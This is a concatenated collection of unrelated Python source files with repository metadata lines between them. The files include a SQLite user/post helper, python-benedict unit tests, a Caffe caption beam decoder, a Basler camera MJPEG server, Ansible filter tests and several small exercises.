sVerifyTimeStamp="1476416373"
#sVerifyNonce=HttpUitls.ParseUrl("nonce")
sVerifyNonce="47744683"
#sVerifyEchoStr=HttpUtils.ParseUrl("echostr")
sVerifyEchoStr="<KEY>
ret,sEchoStr=wxcpt.VerifyURL(sVerifyMsgSig, sVerifyTimeStamp,sVerifyNonce,sVerifyEchoStr)
if(ret!=0):
print("ERR: VerifyURL ret: " + str(ret))
if "__main__" == __name__:
suite = unittest.TestSuite()
suite.addTest(HelperTest("testWxencrypt"))
runner = unittest.TextTestRunner()
runner.run(suite) | 2.1875 | 2 |
contest/youtube/n.py | Akash671/Codechef | 2 | 12773208 |
# cook your dish here
a=int(input())
b=int(input())
while(1):
if a%b==0:
print(a)
break
else:
a-=1
| 3.5 | 4 |
operadores-relacionais.py | anderr8/Introducao_Linguagem_Python | 0 | 12773209 | """
Operadores relacionais
== Igual
!= Diferente
> Maior
< Menor
>= Maior ou igual
<= Menor ou igual
Operadores Lógicos
Operador Operação
AND → Duas condições sejam verdadeiras
OR → Pelo menos uma condição seja verdadeira
NOT → Inverte o valor
"""
"""
x = 2
y = 3
"""
"""
x = 3
y = 3
z = 3
"""
x = 3
y = 3
z = 4
#soma = x + y
print(x == y and x == z)
print(x == y or x == z and z == y) | 4.09375 | 4 |
scripts/beam_decode.py | quangvy2703/Up-Down-Captioner | 232 | 12773210 | #!/usr/bin/env python
"""
Decode a language model using one GPU.
"""
import numpy as np
import argparse
import sys
import json
import caffe
from evaluate import CaptionScorer
from util import restore_weights
def translate(vocab, blob):
caption = "";
w = 0;
while True:
next_word = vocab[int(blob[w])]
if w == 0:
next_word = next_word.title()
if w > 0 and next_word != "." and next_word != ",":
caption += " ";
if next_word == "\"" or next_word[0] == '"':
caption += "\\"; # Escape
caption += next_word;
w += 1
if caption[-1] == '.' or w == len(blob):
break
return caption
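# e.g. translate(['a', 'man', '.'], [0, 1, 2]) returns 'A man.'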
def beam_decode(
model, # net proto definition
vocab_file, # model vocab text file
weights, # pretrained weights to use
gpu, # device id
outfile, # json output
):
vocab = []
with open(vocab_file) as f:
for word in f:
vocab.append(word.strip())
print 'Loaded {:,} words into caption vocab'.format(len(vocab))
caffe.init_log(0, 1)
caffe.log('Using device %s' % str(gpu))
caffe.set_device(int(gpu))
caffe.set_mode_gpu()
net = caffe.Net(model, weights, caffe.TEST)
print 'Loaded proto {} with weights {}'.format(model,weights)
net.layers[0].load_dataset()
id_to_caption = {}
iteration = 0
while True:
ending = False
out = net.forward()
image_ids = net.blobs['image_id'].data
captions = net.blobs['caption'].data
scores = net.blobs['log_prob'].data
batch_size = image_ids.shape[0]
if captions.shape[0] == batch_size:
# Decoding a compact net
beam_size = captions.shape[2]
for n in range(batch_size):
if iteration == 0:
print "\nhttp://mscoco.org/explore/?id=%d" % image_ids[n][0]
for b in range(beam_size):
cap = translate(vocab, captions[n][0][b])
score = scores[n][0][b]
if iteration == 0:
print '[%d] %.2f %s' % (b,score,cap)
else:
# Decoding an unrolled net
beam_size = captions.shape[0] / batch_size
if iteration == 0:
print "Beam size: %d" % beam_size
for n in range(batch_size):
image_id = int(image_ids[n][0])
if iteration == 0:
print "\nhttp://mscoco.org/explore/?id=%d" % image_id
for b in range(beam_size):
cap = translate(vocab, captions[n*beam_size+b])
score = scores[n*beam_size+b]
if b == 0:
if image_id in id_to_caption:
ending = True
else:
id_to_caption[image_id] = cap
if iteration == 0:
print '[%d] %.2f %s' % (b,score,cap)
iteration += 1
if iteration % 1000 == 0:
print 'Iteration: %d' % iteration
if ending:
break
output = []
for image_id in sorted(id_to_caption.keys()):
output.append({
'image_id': image_id,
'caption': id_to_caption[image_id]
})
with open(outfile, 'w') as f:
json.dump(output,f)
print 'Generated %d outputs, saving to %s' % (len(output),outfile)
s = CaptionScorer()
s.score(outfile)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--model", required=True, help="Net proto definition.")
parser.add_argument("--weights", help="Pretrained weights.")
parser.add_argument("--gpu", type=int, default=0, help="Device id.")
parser.add_argument("--vocab", required=True, help="Vocab file.")
parser.add_argument("--outfile", required=True, help="Output file path.")
args = parser.parse_args()
restore_weights(args.weights)
beam_decode(args.model, args.vocab, args.weights, args.gpu, args.outfile)
| 2.5 | 2 |
django_decadence/urls.py | ksiazkowicz/django-decadence | 1 | 12773211 | <gh_stars>1-10
from django.conf.urls import url
from django_decadence.views import generate_html
urlpatterns = [
url(r'^template/$', generate_html, name='decadence_template'),
] | 1.445313 | 1 |
app.py | maikynata/bot-alerta-fogo | 1 | 12773212 | <reponame>maikynata/bot-alerta-fogo<filename>app.py
from flask import Flask
app = Flask(__name__, static_folder='static', static_url_path='')
@app.route("/")
def index():
# Render HTML with count variable
return app.send_static_file("index.html")
if __name__ == "__main__":
app.run() | 2.09375 | 2 |
rachis/urls.py | codeliezel/rachis | 0 | 12773213 | from django.urls import path, include
urlpatterns = [
path('api/', include(('rachis.apps.authentication.urls'), namespace='auth')),
path('api/', include(('rachis.apps.resource.urls'), namespace='resources')),
] | 1.546875 | 2 |
HelloWorld/Python01/_hello/math.py | grtlinux/KieaPython | 1 | 12773214 | # file: math.py
import math
print dir(math)
print math.pi
print math.e
print math.sin(1.0)
print math.sqrt(2)
| 1.945313 | 2 |
tests/dicts/test_benedict_casting.py | next-franciscoalgaba/python-benedict | 365 | 12773215 | # -*- coding: utf-8 -*-
from benedict import benedict
import unittest
class benedict_casting_test_case(unittest.TestCase):
def test__getitem__(self):
d = {
'a': 1,
'b': {
'c': {
'd': 2,
},
},
}
b = benedict(d)
c = b['b.c']
self.assertTrue(isinstance(c, benedict))
self.assertEqual(type(c), benedict)
self.assertTrue(c == d['b']['c'])
self.assertFalse(c is d['b']['c'])
def test_cast_dict_to_benedict(self):
d = {
'a': 1,
'b': {
'c': {
'd': 2,
},
},
}
b = benedict(d)
bb = benedict(b)
bbd = bb.dict()
self.assertTrue(isinstance(bbd, dict))
self.assertFalse(isinstance(bbd, benedict))
self.assertEqual(d, bbd)
self.assertTrue(d is bbd)
def test_cast_benedict_to_dict(self):
b = benedict({
'a': 1,
'b': {
'c': {
'd': 2,
},
},
})
# d1 = dict(**b)
# print(d1)
d = dict(b)
self.assertTrue(isinstance(d, dict))
self.assertEqual(type(d), dict)
self.assertEqual(b, d)
self.assertFalse(b is d)
d = dict(b)
self.assertTrue(isinstance(d, dict))
self.assertEqual(type(d), dict)
self.assertEqual(b, d)
self.assertFalse(b is d)
def test_cast_benedict_kwargs_to_dict(self):
b = benedict({
'a': 1,
'b': {
'c': {
'd': 2,
},
},
})
d = dict(**b)
self.assertTrue(isinstance(d, dict))
self.assertEqual(type(d), dict)
self.assertEqual(b, d)
self.assertFalse(b is d)
def test_dict(self):
d = {
'a': 1,
'b': {
'c': {
'd': 2,
},
},
}
b = benedict(d)
bd = b.dict()
self.assertTrue(isinstance(bd, dict))
self.assertFalse(isinstance(bd, benedict))
self.assertTrue(d == bd)
self.assertTrue(d is bd)
def test_get(self):
d = {
'a': 1,
'b': {
'c': {
'd': 2,
},
},
}
b = benedict(d)
c = b.get('b.c')
self.assertTrue(isinstance(c, benedict))
self.assertEqual(type(c), benedict)
self.assertTrue(c == d['b']['c'])
self.assertFalse(c is d['b']['c'])
def test_get_dict(self):
d = {
'a': 1,
'b': {
'c': {
'd': 2,
},
},
}
b = benedict(d)
c = b.get_dict('b.c')
self.assertTrue(isinstance(c, benedict))
self.assertEqual(type(c), benedict)
self.assertTrue(c == d['b']['c'])
self.assertFalse(c is d['b']['c'])
def test_get_list_item(self):
d = {
'a': 1,
'b': {
'c': [
{ 'd': 2, },
{ 'e': 3, },
{ 'f': 4, },
]
},
}
b = benedict(d)
c = b.get_list_item('b.c', 1)
self.assertTrue(isinstance(c, benedict))
self.assertEqual(type(c), benedict)
self.assertTrue(c == d['b']['c'][1])
self.assertFalse(c is d['b']['c'][1])
def test_pop(self):
d = {
'a': 1,
'b': {
'c': {
'd': 2,
},
},
}
b = benedict(d)
c = b.pop('b.c')
self.assertTrue(isinstance(c, benedict))
self.assertEqual(type(c), benedict)
with self.assertRaises(KeyError):
d['b']['c']
| 3.28125 | 3 |
Mundo 3/ex086.py | erickeloi/ExerciciosTreino | 0 | 12773216 | <reponame>erickeloi/ExerciciosTreino
# Python Exercise 086:
# Write a program that declares a 3x3 matrix and fills it with values read from the keyboard.
# At the end, display the matrix on screen with the correct formatting.
matriz = list()
for contador in range(1, 10):
    if 1 <= contador <= 3:
        valor = int(input(f"Enter the value for element [1, {contador}]: "))
        matriz.append(valor)
    elif 4 <= contador <= 6:
        valor = int(input(f"Enter the value for element [2, {contador-3}]: "))
        matriz.append(valor)
    elif 7 <= contador <= 9:
        valor = int(input(f"Enter the value for element [3, {contador-6}]: "))
        matriz.append(valor)
print()
print("Generating matrix..")
print()
print(f'''[{matriz[0]}] [{matriz[1]}] [{matriz[2]}]\n[{matriz[3]}] [{matriz[4]}] [{matriz[5]}]\n[{matriz[6]}] [{matriz[7]}] [{matriz[8]}]''')
| 4.4375 | 4 |
tests/list_view.py | Aloxaf/moshmosh | 114 | 12773217 | <gh_stars>100-1000
from moshmosh.extensions.pattern_matching.runtime import ListView
v = ListView([1, 2, 3, 5], range(1, 4))
v.sort(reverse=True)
assert v == [5, 3, 2]
v.sort(reverse=False)
assert v == [2, 3, 5]
v.sort(reverse=False, key=lambda x: -x)
assert v == [5, 3, 2]
assert isinstance(v, list) | 2.234375 | 2 |
fish-finder/bin/test-statistics.py | MRSD2018/reefbot-1 | 0 | 12773218 | from FishFinder import *
from numpy import *
import sys
if __name__=="__main__":
dist = Statistics()
print dist.mean()
print dist.variance()
print dist.standard_deviation()
num_samples = int(sys.argv[1])
s = random.normal(0,0.1,num_samples)
dist.update(num_samples,sum(s),sum(s**2.))
print dist.mean()
print dist.variance()
print dist.standard_deviation()
| 2.328125 | 2 |
Module01/AdvFunctions/DictParams2.py | fenglihanxiao/Python | 0 | 12773219 | <gh_stars>0
"""
1. **kwargs usage
"""
def test(**kwargs):
    # A single * (not **) unpacks kwargs into its keys and prints them
    print(*kwargs)
_dict = kwargs
for k in _dict.keys():
print("Key=", k)
print("Value=", _dict[k])
print()
test(a=1, b=2, c=3)
"""
1. * -> unpack container type
"""
list1 = [1, 2, 3]
tuple1 = (3, 4, 5)
set1 = {5, 6, 7}
dict1= {"aa": 123, "bb": 456, "cc": 789}
str1 = "itcast"
print(*list1)
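# The same single-star unpacking applies to the other containers
# (a set's order is arbitrary; a dict unpacks into its keys):
print(*tuple1)
print(*set1)
print(*dict1)
print(*str1)  # a string unpacks into its characters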
def test2():
return 3, 4, 5
# unpack the returned tuple into three variables
a, b, c = test2() | 3.203125 | 3 |
main_processes/backend_monitor/main.py | microsoft/nxs | 5 | 12773220 | import time
from typing import Any, Dict, List
from configs import GLOBAL_QUEUE_NAMES
from nxs_libs.queue import NxsQueueType
from nxs_libs.simple_key_value_db import NxsSimpleKeyValueDbType
from nxs_types.log import NxsBackendCmodelThroughputLog, NxsBackendThroughputLog
from nxs_types.nxs_args import NxsBackendMonitorArgs
from nxs_utils.nxs_helper import (
create_queue_puller_from_args,
create_queue_pusher_from_args,
create_simple_key_value_db_from_args,
)
class NxsBasicBackendMonitor:
def __init__(self, args: NxsBackendMonitorArgs) -> None:
self.args = args
self.model_expiration_secs = 30
self.logs_puller = create_queue_puller_from_args(
args, NxsQueueType.REDIS, GLOBAL_QUEUE_NAMES.BACKEND_LOGS
)
self.logs_puller.set_buf_size(999)
self.kv_store = create_simple_key_value_db_from_args(
args, NxsSimpleKeyValueDbType.REDIS
)
self.logs_dict: Dict[str, Any] = {}
self.logs_ts_dict: Dict[str, float] = {}
def _process_logs(self, logs: List[NxsBackendThroughputLog]):
ts = time.time()
keys_to_remove = []
for key in self.logs_dict:
if ts - self.logs_ts_dict[key] > self.model_expiration_secs:
keys_to_remove.append(key)
for key in keys_to_remove:
self.logs_dict.pop(key)
self.logs_ts_dict.pop(key)
for log in logs:
key = log.backend_name
self.logs_dict[key] = log
self.logs_ts_dict[key] = ts
def _get_stored_logs(self) -> List[NxsBackendThroughputLog]:
logs: List[NxsBackendThroughputLog] = []
for key in self.logs_dict:
logs.append(self.logs_dict[key])
return logs
def run(self):
while True:
logs: List[NxsBackendThroughputLog] = self.logs_puller.pull()
self._process_logs(logs)
self.kv_store.set_value(
GLOBAL_QUEUE_NAMES.BACKEND_MONITOR_LOGS, self._get_stored_logs()
)
time.sleep(self.args.polling_interval_secs)
if __name__ == "__main__":
from main_processes.backend_monitor.args import parse_args
args = parse_args()
monitor = NxsBasicBackendMonitor(args)
monitor.run()
| 1.929688 | 2 |
advanced_descriptors/__init__.py | penguinolog/advanced-descriptors | 2 | 12773221 | # Copyright 2017 - 2021 <NAME> aka penguinolog
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Advanced descriptors for special cases."""
# Local Implementation
from .advanced_property import AdvancedProperty
from .log_on_access import LogOnAccess
from .separate_class_method import SeparateClassMethod
__all__ = ("SeparateClassMethod", "AdvancedProperty", "LogOnAccess")
try:
# Local Implementation
from ._version import version as __version__
except ImportError:
pass
__author__ = "<NAME>"
__author_email__ = "<EMAIL>"
__maintainers__ = {
"<NAME>": "<EMAIL>",
"<NAME>": "<EMAIL>",
"<NAME>": "<EMAIL>",
}
__url__ = "https://github.com/python-useful-helpers/advanced-descriptors"
__description__ = "Advanced descriptors for special cases."
__license__ = "Apache License, Version 2.0"
| 1.953125 | 2 |
python/day11.py | davidlowryduda/AoC18 | 0 | 12773222 | <reponame>davidlowryduda/AoC18
#! /usr/bin/env python3
"""
Solve day 11
"""
from utils import input_lines
def power_level(x, y, serial=8):
"""
A nonsense sequence of steps described in the puzzle instructions.
"""
rackID = x + 10
level = rackID * y
level += serial
level *= rackID
level = (level // 100) % 10
level -= 5
return level
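# Known examples from the puzzle statement:
#   power_level(3, 5, serial=8) == 4
#   power_level(122, 79, serial=57) == -5
#   power_level(217, 196, serial=39) == 0
#   power_level(101, 153, serial=71) == 4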
def compute_power_levels(serial):
"""
Create a grid where grid[(x,y)] has the power_level at position (x,y).
"""
grid = dict()
for x in range(1, 301):
for y in range(1, 301):
grid[(x, y)] = power_level(x, y, serial=serial)
return grid
def compute_sized_powerlevel(grid, x, y, size=3):
"""
Compute combined powerlevel for sizexsize grid with topleft element (x,y).
"""
total_power_level = 0
for i in range(size):
for j in range(size):
total_power_level += grid[(x+i, y+j)]
return total_power_level
def find_largest_trio(grid):
"""
Find the largest 3x3 grid value.
"""
record = 0
record_tuple = (0,0)
for x in range(1, 298):
for y in range(1, 298):
candidate_power = compute_sized_powerlevel(grid, x, y)
if candidate_power > record:
record = candidate_power
record_tuple = (x, y)
return record, record_tuple
def find_largest_anysize(grid):
"""
Find the largest sizexsize grid value.
"""
record = 0
record_tuple = (0, 0, 0)
for x in range(1, 298):
print("On x =", x)
for y in range(1, 298):
maxsize = min(300-x, 300-y)
cand_record, cand_tuple = find_largest_anysize_at_xy(grid, x, y)
if cand_record > record:
record = cand_record
record_tuple = cand_tuple
return record, record_tuple
def find_largest_anysize_at_xy(grid, x, y):
"""
Finds the largest sizexsize grid with top-left location (x,y).
"""
maxsize = min(300 - x, 300 - y)
record = grid[(x,y)]
record_tuple = (x, y, 1)
prevsize = record
for size in range(2, maxsize + 1):
cand = prevsize
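        # Grow the square incrementally: add the new bottom row and right column,
        # then subtract the shared corner cell that both passes counted.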
for i in range(size):
cand += grid[(x+i, y+size-1)]
cand += grid[(x+size-1, y+i)]
cand -= grid[(x+size-1, y+size-1)]
prevsize = cand
if cand > record:
record = cand
record_tuple = (x, y, size)
return record, record_tuple
def do_part_1(day, test=False):
#TESTSERIAL = 18
#TESTSERIAL = 42
MYSERIAL = 5719
grid = compute_power_levels(MYSERIAL)
print(find_largest_trio(grid)[1])
return
def do_part_2(day, test=False):
#TESTSERIAL = 18
MYSERIAL = 5719
grid = compute_power_levels(MYSERIAL)
print(find_largest_anysize(grid))
return
if __name__ == "__main__":
do_part_1(11, test=False)
do_part_2(11, test=False)
| 4.09375 | 4 |
Test-Servers/client.py | Rajatkhatri7/OCR-Api | 0 | 12773223 | <reponame>Rajatkhatri7/OCR-Api<gh_stars>0
import requests
url = 'http://127.0.0.1:5000/v1/ocr'
# use a context manager so the file handle is closed after the upload
with open('test.jpg', 'rb') as img:
    my_img = {'file': img}
    response = requests.post(url, files=my_img)
# response = requests.get(url)
print(response.json()) | 2.671875 | 3 |
db.py | ashwani1218/OpenMEMEs | 1 | 12773224 | <reponame>ashwani1218/OpenMEMEs
import sqlite3
DB_FILE = 'OpenMEMEs.db'
def createDB():
""" This function creates the necessary tables in the db.
UPDATE THIS WHEN YOU CREATE NEW TABLES
TABLES:
users -> This table has all the registered users.
posts -> This table contains all the posts posted by registered users.
Contains the foreign key of user.id.
"""
DATABASE = sqlite3.connect(DB_FILE)
cur=DATABASE.cursor()
#USERS TABLE
sql_command = """CREATE TABLE IF NOT EXISTS users (
id INTEGER PRIMARY KEY,
name TEXT,
email TEXT,
password TEXT);"""
cur.execute(sql_command)
#POSTS TABLE
sql_command = """ CREATE TABLE IF NOT EXISTS posts (
id INTEGER PRIMARY KEY,
user_id INTEGER NOT NULL,
post TEXT,
                        post_image TEXT,
                        FOREIGN KEY (user_id) REFERENCES users (id)
                        )
"""
cur.execute(sql_command)
DATABASE.commit()
def insertUser(name,email):
"""
This method inserts user into the db when user does a Google Oauth login
"""
with sqlite3.connect(DB_FILE) as con:
cur = con.cursor()
cur.execute("SELECT email FROM users WHERE email = ?", (email,))
row = cur.fetchone()
if not row:
cur.execute("INSERT into users (name, email) values (?,?)",(name,email))
con.commit()
def insertOnRegistration(name,email,password):
"""
This method inserts user into db when user registers.
Returns True if user is already registered, False otherwise.
"""
with sqlite3.connect(DB_FILE) as con:
cur = con.cursor()
cur.execute("SELECT email FROM users WHERE email = ?", (email,))
row = cur.fetchone()
if not row:
cur.execute("INSERT into users (name, email,password) values (?,?,?)",(name,email,password))
con.commit()
return False
return True
def get_posts(posts=10):
'''
This method gets all the post up-to the given limit
'''
with sqlite3.connect(DB_FILE) as con:
cur = con.cursor()
cur.execute("select post,post_image,name FROM posts INNER JOIN users on posts.user_id=users.id ORDER BY posts.id DESC LIMIT ?", (posts,))
return cur.fetchall()
def new_post(userId,postText, image_path):
'''
This method inserts post into the db.
'''
with sqlite3.connect(DB_FILE) as con:
cur = con.cursor()
try:
cur.execute("Insert into posts (user_id,post,post_image) values (?,?,?)",(userId,postText,image_path))
con.commit()
return True
except:
return False
def getUserByEmail(email):
'''
This method finds user using email
'''
with sqlite3.connect(DB_FILE) as con:
cur = con.cursor()
cur.execute("SELECT * FROM users Where email=? ",(email,))
user = cur.fetchone()
return user
def getPasswordByEmail(email):
'''
This method finds user's password using email
Returns none if user doesn't exist
'''
with sqlite3.connect(DB_FILE) as con:
cur = con.cursor()
cur.execute("SELECT password FROM users Where email=? ",(email,))
password = cur.fetchone()
if password:
return password[0]
else:
return None
def getNameByEmail(email):
'''
This method finds user's name using email
'''
with sqlite3.connect(DB_FILE) as con:
cur = con.cursor()
cur.execute("SELECT name FROM users Where email=? ",(email,))
name = cur.fetchone()[0]
return name
def getIdByEmail(email):
'''
This method finds user's Id using email
'''
with sqlite3.connect(DB_FILE) as con:
cur = con.cursor()
cur.execute("SELECT id FROM users Where email=? ",(email,))
id = cur.fetchone()[0]
return id
| 3.765625 | 4 |
venv/lib/python3.6/site-packages/ansible_collections/ansible/utils/tests/unit/plugins/filter/test_from_xml.py | usegalaxy-no/usegalaxy | 1 | 12773225 | # -*- coding: utf-8 -*-
# Copyright 2020 Red Hat
# GNU General Public License v3.0+
# (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import unittest
from ansible.errors import AnsibleError
from ansible.errors import AnsibleFilterError
from ansible_collections.ansible.utils.plugins.filter.from_xml import _from_xml
INVALID_DATA = '<netconf-state xmlns="urn:ietf:params:xml:ns:yang:ietf-netconf-monitoring">'
VALID_DATA = (
'<netconf-state xmlns="urn:ietf:params:xml:ns:yang:ietf-netconf-monitoring">'
"<schemas><schema/></schemas></netconf-state>"
)
OUTPUT = """{"netconf-state": \
{"@xmlns": "urn:ietf:params:xml:ns:yang:ietf-netconf-monitoring", "schemas": {"schema": null}}}"""
class TestFromXml(unittest.TestCase):
def setUp(self):
pass
def test_invalid_data(self):
"""Check passing invalid argspec"""
# missing required arguments
args = ["", INVALID_DATA, "xmltodict"]
kwargs = {}
with self.assertRaises(AnsibleError) as error:
_from_xml(*args, **kwargs)
self.assertIn(
"Error when using plugin 'from_xml': Input Xml is not valid",
str(error.exception),
)
def test_valid_data(self):
"""Check passing valid data as per criteria"""
self.maxDiff = None
args = ["", VALID_DATA, "xmltodict"]
result = _from_xml(*args)
self.assertEqual(result, OUTPUT)
def test_args(self):
"""Check passing invalid argspec"""
# missing required arguments
args = []
kwargs = {}
with self.assertRaises(AnsibleFilterError) as error:
_from_xml(*args, **kwargs)
self.assertIn("missing required arguments: data", str(error.exception))
def test_invalid_engine(self):
"""Check passing invalid argspec"""
# missing required arguments
args = ["", INVALID_DATA, "test"]
kwargs = {}
with self.assertRaises(AnsibleError) as error:
_from_xml(*args, **kwargs)
self.assertIn("engine: test is not supported", str(error.exception))
| 2.125 | 2 |
openprocurement/auction/esco/tests/unit/constants.py | ProzorroUKR/openprocurement.auction.esco | 0 | 12773226 | # -*- coding: utf-8 -*-
AUCTIONS = {
'simple': 'openprocurement.auction.esco.auctions.simple',
'multilot': 'openprocurement.auction.esco.auctions.multilot',
}
| 0.972656 | 1 |
main.py | Lapland-UAS-Tequ/tequ-basler-app | 0 | 12773227 | import io
import json
import os
import sys
from http.server import ThreadingHTTPServer
from mjpegserver import StreamingHandler
from threading import Condition
from threading import Thread
import basler
from utility import ePrint
"""
FrameBuffer is a synchronized buffer which gets each frame and notifies to all waiting clients.
It implements write() method to be used
"""
class FrameBuffer:
def __init__(self):
self.frame = None
self.buffer = io.BytesIO()
self.condition = Condition()
def write(self, buf):
# New frame
with self.condition:
# write to buffer
self.buffer.seek(0)
self.buffer.write(buf)
# crop buffer to exact size
self.buffer.truncate()
# save the frame
self.frame = self.buffer.getvalue()
# notify all other threads
self.condition.notify_all()
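
    # A minimal consumer sketch: block until write() publishes the next frame.
    def read(self):
        with self.condition:
            self.condition.wait()
            return self.frame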
def main():
try:
ePrint(sys.argv)
camera_id = sys.argv[1]
port = int(sys.argv[2])
ePrint("Starting MJPEG Server for camera ID: %s @port %s" % (camera_id, port))
script_path = os.path.dirname(os.path.realpath(__file__))
config_path = script_path+'/'+'config.json'
config_file = open(config_path, "r")
config = json.load(config_file)
config_file.close()
# Create frame_buffer for image data sharing
frame_buffer = FrameBuffer()
# Start camera image grabbing
camera = basler.Basler(config[camera_id], camera_id, frame_buffer)
# Start camera command handler
thread1 = Thread(target=camera.cameraCommandHandler)
thread1.start()
# Start Datastreamer to StdOut
if config[camera_id]["converter"]["OutPutToStdOut"]:
from utility import DataStreamer
streamer = DataStreamer(frame_buffer)
thread2 = Thread(target=streamer.writeToStdout)
thread2.start()
# Start MJPEG server
address = ('', port)
httpd = ThreadingHTTPServer(address, lambda *args: StreamingHandler(frame_buffer, camera_id, *args))
httpd.serve_forever()
finally:
camera.stopGrabbingImages()
thread1.join()
if config["converter"]["OutPutToStdOut"]:
thread2.join()
ePrint("Threads finished...exiting")
ePrint("Program finished")
if __name__ == '__main__':
main()
| 2.984375 | 3 |
examples/optmod/dcopf/dcopf_api.py | Fuinn/mos-examples | 2 | 12773228 | <reponame>Fuinn/mos-examples
import os
import numpy as np
from dotenv import load_dotenv, find_dotenv
load_dotenv(find_dotenv())
from mos.interface import Interface
# Interface
interface = Interface()
# Delete model
interface.delete_model_with_name('DCOPF Model')
# New model
model = interface.new_model('./examples/optmod/dcopf/dcopf_model.py')
# Existing model by name
model = interface.get_model_with_name('DCOPF Model')
# Set inputs
model.set_interface_file('case', './examples/optmod/dcopf/ieee14.m')
model.set_interface_object('feastol', 1.5e-3)
assert(model.get_name() == 'DCOPF Model')
assert(model.get_system() == 'optmod')
assert(model.get_status() == 'created')
# Initial types and shapes
t, s = model.get_variable_type_and_shape('P')
assert(t == 'unknown')
assert(s is None)
# Run
model.run()
# Status
assert(model.get_status() == 'success')
# Input file
f = model.get_interface_file('case')
ff = open(f, 'r')
ff.close()
os.remove(f)
# Input object
assert(model.get_interface_object('feastol') == 1.5e-3)
# Helper object
assert(model.get_helper_object('net')['base_power'] == 100)
# Variable
t, s = model.get_variable_type_and_shape('P')
assert(t == 'hashmap')
assert(isinstance(s, tuple))
assert(s == (5,))
P = model.get_variable_state('P', 'value')
assert(isinstance(P, dict))
assert(len(P) == 5)
for i in range(5):
assert(i in P)
# Function
gen_cost = model.get_function_state('gen_cost', 'value')
assert(isinstance(gen_cost, float))
assert(abs(gen_cost-7642) < 1)
# Constraint
pcb_vio = model.get_constraint_state('power_balance', 'violation')
assert(isinstance(pcb_vio, np.ndarray))
assert(pcb_vio.shape == (14,))
assert(pcb_vio.dtype == float)
assert(np.max(np.abs(pcb_vio)) < 1e-10)
# Solver state
s = model.get_solver_state()
assert(isinstance(s, dict))
assert(s['status'] == 'solved')
# Problem state
s = model.get_problem_state()
assert(isinstance(s, dict))
# Output file
f = model.get_interface_file('output')
ff = open(f, 'r')
ff.close()
os.remove(f)
# Output object
o = model.get_interface_object('output_obj')
assert(isinstance(o, list))
assert(len(o) == 4)
# Execution log
assert(isinstance(model.get_execution_log(), str))
assert(len(model.get_execution_log()) > 0)
| 2.328125 | 2 |
Aulas/aula_2_-_uniform_filter/aula_2.py | ronaldosena/imagens-medicas-2 | 4 | 12773229 | # -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
# FEDERAL UNIVERSITY OF UBERLANDIA
# Faculty of Electrical Engineering
# Biomedical Engineering Lab
# ------------------------------------------------------------------------------
# Author: <NAME>
# Contact: <EMAIL>
# Git: www.github.com/italogfernandes
# This project is based on: https://github.com/ronaldosena/imagens-medicas-2
# Please give the credits to ronaldo sena.
# ------------------------------------------------------------------------------
# Description:
# ------------------------------------------------------------------------------
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# ------------------------------------------------------------------------------
from scipy.misc import imread
import matplotlib.image as mpimg
import scipy.ndimage as ndimage
from matlab_fspecial import fspecial
# First part
files_folder = '../../datasets/'  # path to the folder containing the images
file_names = ('arteriaBMP.bmp','blood0.PNG','blood1.PNG','pe.jpg')
in_images = [imread(files_folder+image_name) for image_name in file_names ]
out_images = [None] * len(file_names)
brightness = 100
mask_sizes = (3,7,25)
kernels = []
for mask_size in mask_sizes:
kernels.append(fspecial('average',mask_size))
# for in_image in in_images:
for i in range(len(file_names)):
in_image = in_images[i]
o1 = in_image + brightness
o1[in_image > (255 - brightness)] = 255
o2 = in_image - brightness
o2[in_image < (0 + brightness)] = 0
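    # Note: for uint8 images the addition/subtraction above wrap around; the masked
    # assignments clamp exactly those overflowed/underflowed pixels to 255 and 0.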
out_images[i] = [o1, o2]
plt.figure()
plt.subplot(2,len(mask_sizes)+1,1)
plt.imshow(in_image, cmap=plt.cm.gray)
plt.title('Original')
plt.subplot(2,len(mask_sizes)+1,len(mask_sizes)+2)
plt.hist(in_image.ravel(),256,[0,256])
plt.title('Histograma original')
out_images_line = []
for j in range(len(mask_sizes)):
out_image = ndimage.uniform_filter(in_image,size=mask_sizes[j])
#out_image = ndimage.correlate(in_image,kernels[j])
out_images_line.append(out_image)
plt.subplot(2, len(mask_sizes)+1, j+2)
plt.imshow(out_image, cmap=plt.cm.gray)
        plt.title('%dx%d mask' % (mask_sizes[j], mask_sizes[j]))
plt.subplot(2, len(mask_sizes)+1,j+len(mask_sizes)+3)
plt.hist(out_image.ravel(),256,[0,256])
        plt.title('Histogram with %dx%d mask' % (mask_sizes[j], mask_sizes[j]))
out_images.append(out_images_line)
plt.show()
| 2.171875 | 2 |
tests/benchmark/pylot_benchmark_test.py | yujialuo/erdos | 0 | 12773230 | <gh_stars>0
import os
import sys
from absl import app
from absl import flags
sys.path.append(
os.path.dirname(
os.path.dirname(os.path.dirname(os.path.abspath(__file__)))))
from examples.benchmarks.pylot.camera_operator import CameraOperator
from examples.benchmarks.pylot.lidar_operator import LidarOperator
from examples.benchmarks.pylot.detection_operator import DetectionOperator
from examples.benchmarks.pylot.segmentation_operator import SegmentationOperator
from examples.benchmarks.pylot.slam_operator import SLAMOperator
from examples.benchmarks.pylot.tracker_operator import TrackerOperator
import erdos.graph
FLAGS = flags.FLAGS
flags.DEFINE_string('framework', 'ros',
'Execution framework to use: ros | ray.')
def main(argv):
# Set up graph
graph = erdos.graph.get_current_graph()
# Add operators
camera = graph.add(
CameraOperator, name='camera', setup_args={'op_name': 'camera'})
detector = graph.add(
DetectionOperator,
name='detector',
init_args={
'min_runtime_us': 1,
'max_runtime_us': 100,
'min_det_objs': 3,
'max_det_objs': 15
},
setup_args={'op_name': 'detector'})
lidar = graph.add(
LidarOperator,
name='lidar',
init_args={'num_points': 100000},
setup_args={'op_name': 'lidar'})
tracker = graph.add(
TrackerOperator,
name='tracker',
init_args={
'min_runtime_us': 1,
'max_runtime_us': 100
},
setup_args={'op_name': 'tracker'})
segmentation = graph.add(
SegmentationOperator,
name='seg',
init_args={
'min_runtime_us': 1,
'max_runtime_us': 100
},
setup_args={'op_name': 'seg'})
slam = graph.add(
